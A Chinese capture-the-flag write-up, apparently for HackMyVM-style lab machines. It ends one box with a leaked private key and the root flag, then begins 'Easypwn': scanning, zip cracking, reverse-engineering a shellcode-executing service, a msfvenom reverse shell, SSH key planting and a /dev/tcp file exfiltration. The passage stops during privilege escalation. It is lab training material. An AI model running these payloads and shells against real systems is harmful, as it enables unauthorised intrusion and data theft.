1fkofhBy75ijNQTXUHhAwuDaN5/zGfO+HS6iQ1YWYiXVZzPsktV4kFpKkUMklC9VjlFjPi
t1zMCGVDXu2qgfoxwsxRwknKUt75osVPN9HNAU3LVqviencqvNkyPX9WXpb+z7GUf7FQAA
AMEAytl5PGb1fSnUYB2Q+GKyEk/SGmRdzV07LiF9FgHMCsEJEenk6rArffc2FaltHYQ/Hz
w/GnQakUjYQTNnUIUqcxC59SvbfAKf6nbpYHzjmWxXnOvkoJ7cYZ/sYo5y2Ynt2QcjeFxn
vD9I8ACJBVQ8LYUffvuQUHYTTkQO1TnptZeWX7IQml0SgvucgXdLekMNu6aqIh71AoZYCj
rirB3Y5jjhhzwgIK7GNQ7oUe9GsErmZjD4c4KueznC5r+tQXu3AAAAwQDWGTkRzOeKRxE/
C6vFoWfAj3PbqlUmS6clPOYg3Mi3PTf3HyooQiSC2T7pK82NBDUQjicTSsZcvVK38vKm06
K6fle+0TgQyUjQWJjJCdHwhqph//UKYoycotdP+nBin4x988i1W3lPXzP3vNdFEn5nXd10
5qIRkVl1JvJEvrjOd+0N2yYpQOE3Qura055oA59h7u+PnptyCh5Y8g7O+yfLdw3TzZlR5T
DJC9mqI25np/PtAKNBEuDGDGmOnzdU47sAAADBAMeBRAhIS+rM/ZuxZL54t/YL3UwEuQis
sJP2G3w1YK7270zGWmm1LlbavbIX4k0u/V1VIjZnWWimncpl+Lhj8qeqwdoAsCv1IHjfVF
dhIPjNOOghtbrg0vvARsMSX5FEgJxlo/FTw54p7OmkKMDJREctLQTJC0jRRRXhEpxw51cL
3qXILoUzSmRum2r6eTHXVZbbX2NCBj7uH2PUgpzso9m7qdf7nb7BKkR585f4pUuI01pUD0
DgTNYOtefYf4OEpwAAABFyb290QHVidW50dXNlcnZlcg==
-----END OPENSSH PRIVATE KEY-----
但是发现使用私钥进行登录还是需要我输入密码,问了一下kimi,他是这样说的
这是因为你的私钥文件的权限设置不正确。ssh客户端要求私钥文件只能被用户自己读写,也就是权限为600。而你的私钥文件权限是644,这意味着其他用户也可以读取该文件,这存在安全隐患,所以ssh客户端会忽略这个私钥文件,转而要求你输入密码进行认证。
要解决这个问题,你需要修改私钥文件的权限。可以使用以下命令来修改权限:
chmod 600 id
这样设置后,私钥文件的权限就符合ssh客户端的要求,之后再使用该私钥文件进行ssh连接时,就不需要输入密码了,前提是你的服务器端已经正确配置了该用户的公钥。
也就是文件的权限不对,需要把权限修改为只能用户自己读取,即修改文件权限为600,这样就能登录进去了
┌──(root㉿zss)-[/]
└─# ssh root@192.168.1.105 -i id
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 19 Mar 2025 02:13:47 PM UTC
System load: 0.01 Processes: 207
Usage of /: 58.7% of 9.75GB Users logged in: 0
Memory usage: 39% IPv4 address for enp0s17: 192.168.1.105
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Wed Sep 11 09:24:50 2024
root@lookup:~$ ls
total 40K
drwx------ 5 root root 4.0K Apr 2 2024 .
drwxr-xr-x 19 root root 4.0K Jan 11 2024 ..
lrwxrwxrwx 1 root root 9 Jun 2 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.2K Jan 11 2024 .bashrc
drwx------ 2 root root 4.0K Jan 11 2024 .cache
-rwxrwx--- 1 root root 66 Jan 11 2024 cleanup.sh
drwxr-xr-x 3 root root 4.0K Jun 21 2023 .local
-rw-r--r-- 1 root root 161 Jan 11 2024 .profile
-rw-r----- 1 root root 33 Jan 11 2024 root.txt
lrwxrwxrwx 1 root root 9 Jul 31 2023 .selected_editor -> /dev/null
drwx------ 2 root root 4.0K Jan 11 2024 .ssh
-rw-rw-rw- 1 root root 3.1K Apr 2 2024 .viminfo
root@lookup:~$ cat root.txt
5a285a9f257e45c68bb6c9f9f57d18e8
Easypwn
信息搜集
ip地址为192.168.56.110
┌──(root㉿zss)-[/home/zss/桌面/clash-for-linux-master]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:79:ea:cb, IPv4: 192.168.56.108
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:42:8a:a5 PCS Systemtechnik GmbH
192.168.56.110 08:00:27:65:55:68 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.021 seconds (126.67 hosts/sec). 3 responded
搜集一下端口信息
┌──(root㉿zss)-[/home/zss/桌面/clash-for-linux-master]
└─# nmap -p- 192.168.56.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 18:57 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.110
Host is up (0.0047s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6666/tcp open irc
MAC Address: 08:00:27:65:55:68 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
┌──(root㉿zss)-[/home/zss/桌面/clash-for-linux-master]
└─# nmap -sV -sT -sC 192.168.56.110 -p 80,6666
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 19:06 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.110
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Don't Hack Me
6666/tcp open tcpwrapped
MAC Address: 08:00:27:65:55:68 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds
看到这个6666端口的服务去搜了一下tcpwrapped,发现可以利用一个漏洞,但是没有成功
msf6 > search tcpwrapped
[-] No results from search
msf6 > search rsh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rservices/rsh_login . normal No rsh Authentication Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/rservices/rsh_login
msf6 > use 0
msf6 auxiliary(scanner/rservices/rsh_login) > show options
Module options (auxiliary/scanner/rservices/rsh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession true no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&re
alm)
ENABLE_STDERR false yes Enables connecting the stderr port
FROMUSER no The username to login from
FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/ no File containing from usernames, one per line
rservices_from_users.txt
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 514 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/rservices/rsh_login) > info
Name: rsh Authentication Scanner
Module: auxiliary/scanner/rservices/rsh_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
jduck <jduck@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession true no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&rea
lm)
ENABLE_STDERR false yes Enables connecting the stderr port
FROMUSER no The username to login from
FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/ no File containing from usernames, one per line
rservices_from_users.txt
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
etasploit.html
RPORT 514 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module will test a shell (rsh) service on a range of machines and
report successful logins.
NOTE: This module requires access to bind to privileged ports (below 1024).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0651
https://nvd.nist.gov/vuln/detail/CVE-1999-0502
View the full module info with the info -d command.
msf6 auxiliary(scanner/rservices/rsh_login) > set rhosts 192.168.56.110
rhosts => 192.168.56.110
msf6 auxiliary(scanner/rservices/rsh_login) > set rport 6666
rport => 6666
msf6 auxiliary(scanner/rservices/rsh_login) > run
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Starting rsh sweep
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username '' from 'root'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine [*] 等待客户端连接...
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username '' from 'daemon'
[-] 192.168.56.110:6666 - Unable to connect: The destination is invalid: (192.168.56.110:6666).
[*] 192.168.56.110:6666 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rservices/rsh_login) > sessions
Active sessions
===============
No active sessions.
msf6 auxiliary(scanner/rservices/rsh_login) > info
Name: rsh Authentication Scanner
Module: auxiliary/scanner/rservices/rsh_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
jduck <jduck@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession true no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&rea
lm)
ENABLE_STDERR false yes Enables connecting the stderr port
FROMUSER no The username to login from
FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/ no File containing from usernames, one per line
rservices_from_users.txt
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.168.56.110 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
etasploit.html
RPORT 6666 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module will test a shell (rsh) service on a range of machines and
report successful logins.
NOTE: This module requires access to bind to privileged ports (below 1024).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0651
https://nvd.nist.gov/vuln/detail/CVE-1999-0502
View the full module info with the info -d command.
msf6 auxiliary(scanner/rservices/rsh_login) > set PASS_FILE /home/zss/字典/1000_passwd.txt
PASS_FILE => /home/zss/字典/1000_passwd.txt
msf6 auxiliary(scanner/rservices/rsh_login) > set USERPASS_FILE /home/zss/字典/Seclist/SecLists-master/Usernames/Names/names.txt
USERPASS_FILE => /home/zss/字典/Seclist/SecLists-master/Usernames/Names/names.txt
msf6 auxiliary(scanner/rservices/rsh_login) > exploit
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Starting rsh sweep
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'root'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'daemon'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'bin'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'nobody'
[-] 192.168.56.110:6666 - Unable to connect: The destination is invalid: (192.168.56.110:6666).
[*] 192.168.56.110:6666 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
用dirsearch扫目录发现啥也没扫到,换成gobuster
┌──(root㉿kali-plus)-[/usr/share/seclists/Discovery/Web-Content]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.110/ -x.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.110/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/mysecret.txt (Status: 200) [Size: 383]
/server-status (Status: 403) [Size: 279]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished
===============================================================
发现一个mysecret.txt,curl一下
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.110/mysecret.txt
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.
去那个最邪恶的端口。
你会得到你想要的。
请对他温柔一点,也许它会害怕。
为了得到它的源码。
也许你会需要下面的字典。
/YTlPX4d2UENbWnI.txt
再curl一下
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.110/YTlPX4d2UENbWnI.txt
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower
把这些当作字典,对目录进行模糊测试
┌──(root㉿kali-plus)-[~]
└─# wfuzz -w easypwn.txt -u http://192.168.56.110/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.110/FUZZ
Total requests: 9
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 404 9 L 31 W 276 Ch "ta0"
000000003: 404 9 L 31 W 276 Ch "bamuwe"
000000007: 404 9 L 31 W 276 Ch "lvzhouhang"
000000009: 404 9 L 31 W 276 Ch "flower"
000000008: 404 9 L 31 W 276 Ch "qiaojojo"
000000002: 404 9 L 31 W 276 Ch "lingmj"
000000004: 404 9 L 31 W 276 Ch "todd"
000000006: 404 9 L 31 W 276 Ch "primary"
000000005: 200 2902 L 27928 W 700694 Ch "ll104567"
Total time: 0
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 0
测试到一个/ll104567目录,访问之后下载了一个文件,file了一下发现是一个压缩包,但是unzip需要密码
下载到本机使用archpr进行爆破,得到密码oooooo,解压之后有一个opt目录,目录下面是一个叫server的文件,当然这样比较麻烦,这时就会有兄弟问了,主播主播,你这样操作确实能解出来,但还是太麻烦了,有没有既简单又快捷的方法呢,有的兄弟有的,像这样的方法还有九个
┌──(root㉿kali-plus)-[~/easypwn]
└─# zip2john ll104567.zip > tmp
ver 2.0 efh 5455 efh 7875 ll104567.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8
┌──(root㉿kali-plus)-[~/easypwn]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
oooooo (ll104567.zip/opt/server)
1g 0:00:00:00 DONE (2025-03-20 21:50) 16.66g/s 546133p/s 546133c/s 546133C/s 123456..eatme1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali-plus)-[~/easypwn]
└─# john tmp -show
ll104567.zip/opt/server:oooooo:opt/server:ll104567.zip::ll104567.zip
1 password hash cracked, 0 left
使用zip2john更快更方便,但是得到的文件好像是一个二进制文件
user flag
用ida打开并找到main函数,把main的代码扔给deepseek看一眼
int __fastcall main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rdx
__int64 v5; // rax
std::ostream *v6; // rax
std::ostream *v7; // rax
std::ostream *v8; // rax
size_t v9; // rax
std::ostream *v10; // rax
char buf[4108]; // [rsp+0h] [rbp-1070h] BYREF
int v12; // [rsp+100Ch] [rbp-64h] BYREF
__int16 v13[2]; // [rsp+1010h] [rbp-60h] BYREF
int v14; // [rsp+1014h] [rbp-5Ch]
void (*v15)(void); // [rsp+1028h] [rbp-48h]
char *v16; // [rsp+1030h] [rbp-40h]
char v17; // [rsp+103Fh] [rbp-31h]
char *v18; // [rsp+1040h] [rbp-30h]
__int64 *v19; // [rsp+1048h] [rbp-28h]
unsigned __int64 len; // [rsp+1050h] [rbp-20h]
unsigned int v21; // [rsp+1058h] [rbp-18h]
unsigned int fd; // [rsp+105Ch] [rbp-14h]
char *v23; // [rsp+1060h] [rbp-10h]
int i; // [rsp+1068h] [rbp-8h]
bool v25; // [rsp+106Fh] [rbp-1h]
ssignal(11LL, signal_handler, envp);
ssignal(13LL, signal_handler, v3);
v12 = 1;
fd = socket(2LL, 1LL, 0LL);
if ( fd )
{
if ( (unsigned int)setsockopt(fd, 1LL, 2LL, &v12, 4LL) )
{
perror(&unk_53C044);
close(fd);
return 1;
}
else
{
v13[0] = 2;
v14 = 0;
v13[1] = ntohs(6666LL);
if ( (int)bind(fd, v13, 16LL) >= 0 )
{
if ( (int)listen(fd, 5LL) >= 0 )
{
v5 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
v6 = (std::ostream *)std::ostream::operator<<(v5, 6666LL);
v7 = (std::ostream *)std::operator<<<std::char_traits<char>>(v6);
std::endl<char,std::char_traits<char>>(v7);
while ( 1 )
{
while ( 1 )
{
v8 = (std::ostream *)std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
std::endl<char,std::char_traits<char>>(v8);
v21 = accept(fd, 0LL, 0LL);
if ( (v21 & 0x80000000) == 0 )
break;
perror(&unk_53C0C9);
}
dup2(v21, 0LL);
dup2(v21, 1LL);
dup2(v21, 2LL);
close(v21);
len = read(0, buf, 0x1000uLL);
v25 = (__int64)len > 0;
for ( i = 0; v25 && (__int64)len > i; ++i )
{
v19 = &forbidden_bytes;
v23 = (char *)&forbidden_bytes;
v18 = (char *)&forbidden_bytes + 7;
while ( 1 )
{
if ( v23 == v18 )
goto LABEL_20;
v17 = *v23;
if ( v17 == buf[i] )
break;
++v23;
}
v25 = 0;
LABEL_20:
if ( !v25 )
break;
}
if ( !v25 )
{
v16 = "Hackers, get out of my machine\n";
v9 = j_strlen_ifunc("Hackers, get out of my machine\n");
write(1u, v16, v9);
close(v21);
}
else
{
v15 = (void (*)(void))mmap64(0LL, len, 7uLL, 0x22uLL, 0xFFFFFFFFuLL, 0LL);
if ( v15 == (void (*)(void))-1LL )
{
perror("[!] 鍐呭瓨鏄犲皠澶辫触");
close(v21);
}
else
{
j_memcpy(v15, buf, len);
v15();
munmap(v15, len);
v10 = (std::ostream *)std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
std::endl<char,std::char_traits<char>>(v10);
}
}
}
}
perror("[!] 鐩戝惉澶辫触");
close(fd);
return 1;
}
else
{
perror(&unk_53C061);
close(fd);
return 1;
}
}
}
else
{
perror("[!] socket鍒涘缓澶辫触");
return 1;
}
}
这段代码是一个监听6666端口的TCP服务器,其功能是接收客户端发送的Shellcode代码并执行,但会过滤特定危险字节以防止攻击。以下是详细分析:
1. 初始化和信号处理
信号处理:注册信号处理函数,处理SIGSEGV(段错误)和SIGPIPE(管道破裂)信号,增强程序健壮性。
创建套接字:使用socket(2, 1, 0)创建TCP套接字(AF_INET + SOCK_STREAM)。
设置地址重用:通过setsockopt设置SO_REUSEADDR选项,避免端口占用问题。
2. 绑定与监听
绑定端口:将套接字绑定到本地6666端口(ntohs(6666)转换为网络字节序)。
监听连接:调用listen开始监听,队列长度为5。
3. 接受客户端连接
循环接受连接:在无限循环中通过accept接收客户端连接,返回新的文件描述符v21。
I/O重定向:使用dup2将标准输入、输出、错误重定向到客户端套接字,实现与客户端的交互。
4. 数据读取与过滤
读取数据:从客户端读取最多4096字节(0x1000)到栈缓冲区buf。
字节过滤检查:遍历每个字节,检查是否存在于全局变量forbidden_bytes中。若存在,则拒绝执行并返回错误信息。
5. Shellcode执行
内存映射:通过mmap分配可读、可写、可执行的内存区域(PROT_READ|WRITE|EXEC)。
代码复制与执行:将客户端发送的数据(Shellcode)复制到映射的内存,并跳转执行。
清理资源:执行后调用munmap释放内存,关闭连接。
关键安全机制
禁止字节过滤:通过forbidden_bytes阻止包含危险指令(如syscall)的代码执行。
内存保护:使用mmap的MAP_ANONYMOUS标志避免文件映射,限制内存作用域。
潜在风险
过滤绕过:若forbidden_bytes未覆盖所有危险指令(如编码后的Shellcode),仍可能执行恶意代码。
内存执行风险:允许任意代码执行存在极高风险,需严格限制客户端信任度。
总结
该程序是一个实验性Shellcode执行环境,设计上通过端口监听接收并运行代码,但加入了基础过滤机制。需注意其安全隐患,适用于封闭测试环境,不建议暴露于公网。
发现是有被禁止的字符的,可以在ida里面对forbidden_bytes进行跟踪
.rodata:000000000053C009 _ZL15forbidden_bytes db 0 ; DATA XREF: main+25E↑o
.rodata:000000000053C009 ; main+269↑o
.rodata:000000000053C00A db 20h
.rodata:000000000053C00B db 0Fh
.rodata:000000000053C00C db 0CDh
.rodata:000000000053C00D db 9
.rodata:000000000053C00E db 22h ; "
.rodata:000000000053C00F db 0Ah
可以发现禁用了0x00 (NULL)`` 0x20(space)``0x0F``0xCD,利用msfvenom生成一个反弹shell的shellcode
┌──(root㉿kali-plus)-[~/easypwn]
└─# msfvenom -p linux/x64/shell_reverse_tcp Lhost=192.168.56.101 Lprot=4444 -b '\x00\x20\x0f\xcd' -f raw > tmp
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes
使用xxd命令可以查看文件的十六进制
┌──(root㉿kali-plus)-[~/easypwn]
└─# xxd tmp
00000000: 4831 c948 81e9 f6ff ffff 488d 05ef ffff H1.H......H.....
00000010: ff48 bb56 b0d9 320a ef81 cb48 3158 2748 .H.V..2....H1X'H
00000020: 2df8 ffff ffe2 f43c 9981 ab60 edde a157 -......<...`...W
00000030: eed6 3742 78c9 7254 b0c8 6eca 47b9 ae07 ..7Bx.rT..n.G...
00000040: f850 d460 ffdb a17c e8d6 3760 ecdf 83a9 .P.`...|..7`....
00000050: 7eb3 1352 e084 bea0 dae2 6a93 a73a e434 ~..R......j..:.4
00000060: d9b7 1d79 8781 981e 393e 605d a708 2d59 ...y....9>`]..-Y
00000070: b5d9 320a ef81 cb ..2....
、┌──(root㉿kali-plus)-[~]
└─# nc -lp 4444
id
uid=1001(lamb) gid=1001(lamb) groups=1001(lamb)
bash
ls
this_is_a_tips.txt
use3e3e3e3e3sr.txt
成功反弹shell,然后就可以拿user flag了
lamb@pwnding:/home/lamb$ cat use3e3e3e3e3sr.txt
cat use3e3e3e3e3sr.txt
flag{3a463d08f2ae11efbeb6000c29094b2d}
提权-root flag
先把自己公钥写进去看看能不能连上
mkdir .ssh
cd .ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC27Gv0W3j0TPawzx/q7rDyzDBYiuRRSs4HLFBpmYIxkxviNL1njJNjA3Mw7UcLAa6o62H7Xn6jlYijg8Q8ttm/BDqtI0N645DrdMOOR6W0N+iZKnkDx7QJ5vPcwE4XTu4rQleQD3fvO8KRAUBakMVPocaai3V9eC9zE4Ex3W/qo0Xk+PNObx5mIT39coHAq7DxzSoWsnHOVnFYqvXgzD44txWOMHIdqSp93AWV0+d37diHgDDWvpxS/BpKfydSFtR728dJ2KXuNfWSiy3R5wPGW6p9JffExiyrg/d6Nw74+8TrzxELM0r0gRjTefVbPZyK8fa4Q2xRPrSaD5bYeIt/wNU6YgWTquj3aPY70eTzkK6gckvwOAmRQ8lLCG67Z8IbnHeQVkVg4uuujq6nRsvMx+YbTTCOLEZQkCQKjpubJYDZsncP9LSNxn/Sq5vpEtKXbBfl1qD41tU72/wg2A4PiYrDkgr3LP26Qbg66xY7Hmtb6PgVe1VnmRoWuUJ6T/S5AtLBNljksXAJru/9HwP0bNpgTuMV06U5JySzf7OoT6Nye5zCOzrWOi3NrZGiKb55ue0EnoFvs1ZEuhgxH/VjdzXNCtV3OJtdlRqbrd+q5Si6fT3ew81tLK040T2w3oKIhIJa9JbhuOK2SR2gXv96qu045/NtXC/re56IIw+Xfw== root@kali-plus' > authorized_keys
ssh lamb@192.168.56.110
lamb@pwnding:~$ ls
this_is_a_tips.txt use3e3e3e3e3sr.txt
lamb@pwnding:~$ cat this_is_a_tips.txt
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.
有一个很好玩的工具叫做 cupp.
听说那是一个不错的社会工程学字典生成器.
现在真的还会有人这么蠢吗?haha.
成为 ROOT 的方法只有一条,就是执行 getroot !!!
而且你不要忘记了,这是一个pwn类型的机器.
接下来可以使用dpkg -v来查看一下哪些文件被修改过
dpkg是“Debian Package”的缩写,是Debian及其衍生发行版(如Ubuntu)中用于软件包管理的核心命令行工具。
dpkg -V命令用于验证已安装的软件包,检查其文件是否被修改过。具体来说,dpkg -V会将当前系统中安装的软件包的文件与软件包原始版本中的文件进行比较,以检测文件是否发生了变化。这在检查系统安全性或确认文件是否被篡改时非常有用。
lamb@pwnding:~$ dpkg -V
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
可以发现/etc/sudoers被修改了,所以现在我们使用sudo要输入密码,但是我们没有密码,这时候还得回归那个提示,需要getroot,先看一下这个getroot文件在哪
lamb@pwnding:~$ find / -name 'getroot' 2>/dev/null
/usr/local/bin/getroot
找到这个getroot,把他搞到kali里,然后在搞到本地进行分析一波
cp /usr/local/bin/getroot .
cat getroot > /dev/tcp/192.168.56.101/1234
再开一个终端用来监听
nc -lp 1234 > getroot
但是我们没有lamb的密码,这下目标就转换成找他的密码了,使用命令find / -user lamb 2>/dev/null|grep -Pv 'sys|proc|run'来找一下密码
lamb@pwnding:~$ find / -user lamb 2>/dev/null|grep -Pv 'sys|proc|run'
/dev/pts/1
/home/lamb
/home/lamb/.viminfo
/home/lamb/getroot
/home/lamb/.profile
/home/lamb/.bashrc
/home/lamb/use3e3e3e3e3sr.txt
/home/lamb/.bash_logout
/home/lamb/.ssh
/home/lamb/.ssh/authorized_keys
/home/lamb/.bash_history
发现没有我们需要的文件,下面找一下隐藏文件,使用命令find / -name '.*' 2>/dev/null|grep -Pv 'sys|proc|run'
lamb@pwnding:~$ find / -name '.*' 2>/dev/null|grep -Pv 'sys|proc|run'
/var/backups/.secret
/var/backups/.secret/.verysecret
/var/backups/.secret/.verysecret/.noooooo
/home/lamb/.viminfo
/home/lamb/.profile
/home/lamb/.bashrc
/home/lamb/.bash_logout
/home/lamb/.ssh
/home/lamb/.bash_history
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.XIM-unix
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.d/.placeholder
/etc/cron.weekly/.placeholder
/etc/cron.monthly/.placeholder
/etc/skel/.profile
/etc/skel/.bashrc
/etc/skel/.bash_logout
/etc/.pwd.lock
发现/var/backups/.secret/.verysecret/.noooooo
lamb@pwnding:~$ cd /var/backups/.secret/.verysecret/.noooooo
